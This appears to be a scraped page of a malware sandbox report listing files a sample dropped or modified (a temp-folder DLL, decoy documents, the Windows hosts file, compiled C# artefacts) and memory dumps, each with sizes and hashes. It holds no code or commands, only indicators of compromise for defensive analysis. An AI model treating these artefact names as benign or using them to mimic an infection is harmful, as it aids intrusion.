C:\Users\Admin\AppData\Local\Temp\ttfdhevw\ttfdhevw.dll

Filesize
4KB

MD5
d3956fab7c9a7b4fc0f2aa44dee0d777

SHA1
c9c4902efbdcedcd9fc83e901ebcfd887f2652d0

SHA256
f696fbea1082be3a47b5d32c43d34443521b6fd219b11f413df8243e403aa9ed

SHA512
2c826368f5c07df3c7bc0efc1f845424a4234fd2a11fb7fb715aaad24782a7f6f6c7a387eb9942923402eb31eef71cb7c9d21ba81609fc2d6441f4c6ddd52c17

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\AssertOptimize.docx

Filesize
226KB

MD5
146fba0ec6f70f3e1b893aeca72a00cf

SHA1
673b240ee2a5fc085cd931538950464272c18d2a

SHA256
a37ac3178c445728de18e326fdc44c6072be3b8149d8c20842b12aa977de4c97

SHA512
d6cd0d10dad22f9ded3ef6f7f984c8052a7b9530722461a351be6f57986e43ff1d35a738bb6c6c98723acca0505b19acc5f356212035e27615122a848c6cbd73

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\PopInstall.docx

Filesize
214KB

MD5
83fe49c066d93da992bab3984fa11adf

SHA1
3d14abe05833f9c69157406dbece92c74f36592e

SHA256
d9ca982a25f3eb490b00e63e6aa145fd1d71e4c41d5b6564918ad612d3055d7c

SHA512
74d278e11f8ee754213910c1c1cb7c43b98a3569186007151ba89588d166d8054f2fc82d9f9d8538779f3a8065786f818da88e99184acba212303735d516cbe2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\WatchCopy.docx

Filesize
15KB

MD5
cf4d2c28916f1826d06b06aaa811ca44

SHA1
b974dc87783c63dfb3f7cf0eee6b78ff7dd112d6

SHA256
383cd7a41c532efacd73e12b494713ec322a0497af260ccca73ea368eb3323b0

SHA512
51db45591612b9951fb5762b7b6d78d53eae8a370c41923ad3f70ff63cbb819020ecda1a1cb27302c50fbc68950d6b3b962791eb45e44212436a53e50453038c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\CompressPublish.doc

Filesize
1.4MB

MD5
50bd38b58650cd177cfa37d8556d1296

SHA1
0c16375a7873c5eddfa399060b55939d0ed6d82a

SHA256
8fd77f539266fdf4b2c3a0abc7d282f55b397271a9615a89b68da67d083b66f9

SHA512
0cb38c3cfa9e349405944e81637833dc650903f62307563af3c2c75c3f022ab394340f491a994ba42173069c4891bf5d5ec2a298e0ec1fde3c9e058be1b53429

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\DismountRename.xlsx

Filesize
12KB

MD5
1ce30031898b7a196802a447ab6b0efe

SHA1
ac35c0b98206a2f56a2958d83e54c7bd092730e3

SHA256
47114863b7bd3ee19aaaf808100e9dedab7527327d2b7e1a5732ddf4232ed01f

SHA512
ce1c7481ac67e51a78e66c3de30cc9dafd15a18470d4f7858bf3ceef4f1394d65f23c7a8ee09d57a33c1c350783e5b3bfea97a173aa5725a58a9522e300ad0b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\EnterUnprotect.docx

Filesize
1.2MB

MD5
bbd25b451897bd2a092c651ef6f3245d

SHA1
c30e5ca31265d5e8499e6f0069b923f73d8b9b3f

SHA256
f047025c1a4625e1b292d052c01ef578955bb64e85a23ced87a61912c0df65b8

SHA512
bcab8d405e14afa4b78d2b22a33b02d8106acb2413bf02ded707915545e63bb1efe78c9e8ff6c24f132c1c6af8aaa0ef1974773c47b4317506a8fb51006d8b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\MountFormat.docx

Filesize
17KB

MD5
0f737b7df1cf264ccf7aaa6f5dac5b7d

SHA1
a948c62f45ec74fa2acdd668d11abc804276060a

SHA256
62d4480a3e484e341a842a172c11c9789ed99cbf7e074d208c3b2e2d4a87e582

SHA512
e7c6ae856dbee2dbd74f382b7b427530b0a0fe53b0af5c0da0dd3c9680710e307cfc4212b3db2a2781b4c2ce1a68a26373bcd982226ef12e5e98a7b178214ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\ResetSubmit.pdf

Filesize
1.4MB

MD5
12f333adba0b642bf1cbb21b2ad0e79c

SHA1
05e9815899dc44e51dd332aa1a6542c5967f17a3

SHA256
2fd60585cf5591f057bfe38d535741ee5edadd1f290262b4fe0db4b313e8193e

SHA512
e428904298e59b16ae05d44d63fb6450c41170f0e0a4d41efeb788fae1557e2731133e044a7c397989e9ffb30afb28120a57076436b91952393ca721f96c58d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\UnlockCompare.pdf

Filesize
1.7MB

MD5
627a2d1db9c2196445f75ff5f3120162

SHA1
0a78056eae46f4cbcac799ba727ba82c6b06aed2

SHA256
48f9f1f386eeca9aef008a653116883ab6e100e15a0845fdb0f956e078c4784e

SHA512
f2d6c740b93e7df88d4c8e2149344579b1b529c516f683dd0ca6ac8f5fd1c349261b243fee5497596a5f76c6ef87f3d0ba372fe15912ac33e8f10176297d8003

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\UnlockInvoke.docx

Filesize
15KB

MD5
690f6a31c24f0ced19ae3495b5bf658c

SHA1
b6fb39f0a1883ff0c96df1b8037233168877ed4f

SHA256
8eea112695566a0235c4f6629f749de814186b228a688e3be3d1f464757c2cf6

SHA512
b6cdce206164f5ee9d188c588818434b2599d14f2dbf28a2579ddbc9f35a5379e59971f21275fc6949ab603f1037f82874757730f2c5490f602d405127daa74c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Downloads\BackupRevoke.rmi

Filesize
632KB

MD5
d9a66452d8fd61662d6c95090b54e5e9

SHA1
be346714508adcb1a33b233c6b612235072326f9

SHA256
3503c6b666cd5539a5bc4dce065b81296711481bab49205c955364b1bead05ff

SHA512
98d6d84be160469939d7d759b07ef3a6a2ce47f1154357280249e8dbd89767598125ebfdeb44b0c446aa4bf591d12480b94ebaaa2ff07a95205eda65e5cf271b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Downloads\CompressBackup.jfif

Filesize
404KB

MD5
8d5e651ee7adf6c10683e1a3f1ae7aed

SHA1
4921f30aa87ac0e256d82e41ffe36fd1f99d5c23

SHA256
c9edd31c3d383ffc6448ce7dd2fe1cfc32491612f57d211338e6c29386c0d75a

SHA512
12ea89fea295200d62660cfc2cc8716e6c9e013addc6f3da720a51dcf2cf4fba3caa29fb3dc54d5254a754374cde58ef15d4200d73f1a4df30298fb85cf1527c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Downloads\ConvertToClear.txt

Filesize
341KB

MD5
e31f37204320944f8f04239ef3435750

SHA1
668dd2a7d26ad7a42ff87a53cb829ed8195456aa

SHA256
db055014c09aa3d11f0b4d3cb69dca9d9b758a82604af95c62fc7f7e3b663bfa

SHA512
9e192255c91bf5b99b75890853ab7f0fdb6476f3775bd66f80ec692eb3f52611df5903a2074648fcff09af7a98d0432eaa83c971e26bc0514a46e4aba46f8bb2

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ttfdhevw\CSCC4FEF1689B6345C295B3791E1CF01751.TMP

Filesize
652B

MD5
98eeebc0e0fc5abe9874341493ff4495

SHA1
8a9de84cb97e1e3449f5781fa7cdaf8ae0733f6c

SHA256
44d67c40f8325c2f3dabadbfaa3efe630cae438cfa29648dcf859ca9cd75f84f

SHA512
64566832a9949965c425fcabdaf529d259f44c7773b651cf97f1bf4b661233838cf041818b36fde6f307f3f2bc72ced55353446f3301bda180ffa8bc70571fea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ttfdhevw\ttfdhevw.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ttfdhevw\ttfdhevw.cmdline

Filesize
607B

MD5
f9e1d527597511642eb07745fa6c4c50

SHA1
1b5f1494abc19d1c5797362af9298451aaf8ccd9

SHA256
8d49ec68bda70eddba4cbd0f0143535b2dded0540b174759ee49f0b22821b958

SHA512
cf9bb84b9d8f410fa318336e6746359e70428936747f7196cabaced1fe06d04956923cd7e73262624ecd38680faf94f264f35ef00c82cce7b5a6af6c859b80bf

Download Submit
memory/2084-92-0x0000019116BC0000-0x0000019116BE2000-memory.dmp

Filesize
136KB

Download
memory/3612-208-0x0000014A50B70000-0x0000014A50B78000-memory.dmp

Filesize
32KB

Download
memory/4152-56-0x00007FFD00B60000-0x00007FFD00B79000-memory.dmp

Filesize
100KB

Download
memory/4152-82-0x00007FFCED8D0000-0x00007FFCED9E8000-memory.dmp

Filesize
1.1MB

Download
memory/4152-107-0x00007FFD00750000-0x00007FFD0076F000-memory.dmp

Filesize
124KB

Download
memory/4152-194-0x00007FFD00510000-0x00007FFD00529000-memory.dmp

Filesize
100KB

Download
memory/4152-71-0x00007FFCFD1B0000-0x00007FFCFD268000-memory.dmp

Filesize
736KB

Download
memory/4152-72-0x0000016B89500000-0x0000016B89875000-memory.dmp

Filesize
3.5MB

Download
memory/4152-73-0x00007FFD00A30000-0x00007FFD00A54000-memory.dmp

Filesize
144KB

Download
memory/4152-81-0x00007FFD00B60000-0x00007FFD00B79000-memory.dmp

Filesize
100KB

Download
memory/4152-74-0x00007FFCED9F0000-0x00007FFCEDD65000-memory.dmp

Filesize
3.5MB

Download
memory/4152-68-0x00007FFCFC6A0000-0x00007FFCFCB0E000-memory.dmp

Filesize
4.4MB

Download
memory/4152-269-0x00007FFD00490000-0x00007FFD004BE000-memory.dmp

Filesize
184KB

Download
memory/4152-270-0x00007FFCFD1B0000-0x00007FFCFD268000-memory.dmp

Filesize
736KB

Download
memory/4152-66-0x00007FFD00490000-0x00007FFD004BE000-memory.dmp

Filesize
184KB

Download
memory/4152-64-0x00007FFD007D0000-0x00007FFD007DD000-memory.dmp

Filesize
52KB

Download
memory/4152-62-0x00007FFD00510000-0x00007FFD00529000-memory.dmp

Filesize
100KB

Download
memory/4152-60-0x00007FFCFCC30000-0x00007FFCFCDA1000-memory.dmp

Filesize
1.4MB

Download
memory/4152-58-0x00007FFD00750000-0x00007FFD0076F000-memory.dmp

Filesize
124KB

Download
memory/4152-79-0x00007FFD005A0000-0x00007FFD005AD000-memory.dmp

Filesize
52KB

Download
memory/4152-54-0x00007FFD00560000-0x00007FFD0058D000-memory.dmp

Filesize
180KB

Download
memory/4152-48-0x00007FFD045A0000-0x00007FFD045AF000-memory.dmp

Filesize
60KB

Download
memory/4152-282-0x0000016B89500000-0x0000016B89875000-memory.dmp

Filesize
3.5MB

Download
memory/4152-30-0x00007FFD00A30000-0x00007FFD00A54000-memory.dmp

Filesize
144KB

Download
memory/4152-25-0x00007FFCFC6A0000-0x00007FFCFCB0E000-memory.dmp

Filesize
4.4MB

Download
memory/4152-108-0x00007FFCFCC30000-0x00007FFCFCDA1000-memory.dmp

Filesize
1.4MB

Download
memory/4152-76-0x00007FFCFD440000-0x00007FFCFD454000-memory.dmp

Filesize
80KB

Download
memory/4152-78-0x00007FFD00560000-0x00007FFD0058D000-memory.dmp

Filesize
180KB

Download
memory/4152-289-0x00007FFCED9F0000-0x00007FFCEDD65000-memory.dmp

Filesize
3.5MB

Download
memory/4152-316-0x00007FFCFCC30000-0x00007FFCFCDA1000-memory.dmp

Filesize
1.4MB

Download
memory/4152-315-0x00007FFD00750000-0x00007FFD0076F000-memory.dmp

Filesize
124KB

Download
memory/4152-311-0x00007FFD00A30000-0x00007FFD00A54000-memory.dmp

Filesize
144KB

Download
memory/4152-310-0x00007FFCFC6A0000-0x00007FFCFCB0E000-memory.dmp

Filesize
4.4MB

Download
memory/4152-325-0x00007FFCFC6A0000-0x00007FFCFCB0E000-memory.dmp

Filesize
4.4MB

Download
memory/4152-353-0x00007FFCED8D0000-0x00007FFCED9E8000-memory.dmp

Filesize
1.1MB

Download
memory/4152-352-0x00007FFD005A0000-0x00007FFD005AD000-memory.dmp

Filesize
52KB

Download
memory/4152-351-0x00007FFCFD440000-0x00007FFCFD454000-memory.dmp

Filesize
80KB

Download
memory/4152-350-0x00007FFCFD1B0000-0x00007FFCFD268000-memory.dmp

Filesize
736KB

Download
memory/4152-349-0x00007FFCED9F0000-0x00007FFCEDD65000-memory.dmp

Filesize
3.5MB

Download
memory/4152-348-0x00007FFD00490000-0x00007FFD004BE000-memory.dmp

Filesize
184KB

Download
memory/4152-347-0x00007FFD007D0000-0x00007FFD007DD000-memory.dmp

Filesize
52KB

Download
memory/4152-346-0x00007FFD00510000-0x00007FFD00529000-memory.dmp

Filesize
100KB

Download
memory/4152-345-0x00007FFCFCC30000-0x00007FFCFCDA1000-memory.dmp

Filesize
1.4MB

Download
memory/4152-344-0x00007FFD00750000-0x00007FFD0076F000-memory.dmp

Filesize
124KB

Download
memory/4152-343-0x00007FFD00B60000-0x00007FFD00B79000-memory.dmp

Filesize
100KB

Download
memory/4152-342-0x00007FFD00560000-0x00007FFD0058D000-memory.dmp

Filesize
180KB

Download
memory/4152-341-0x00007FFD045A0000-0x00007FFD045AF000-memory.dmp

Filesize
60KB

Download
memory/4152-340-0x00007FFD00A30000-0x00007FFD00A54000-memory.dmp

Filesize
144KB

Download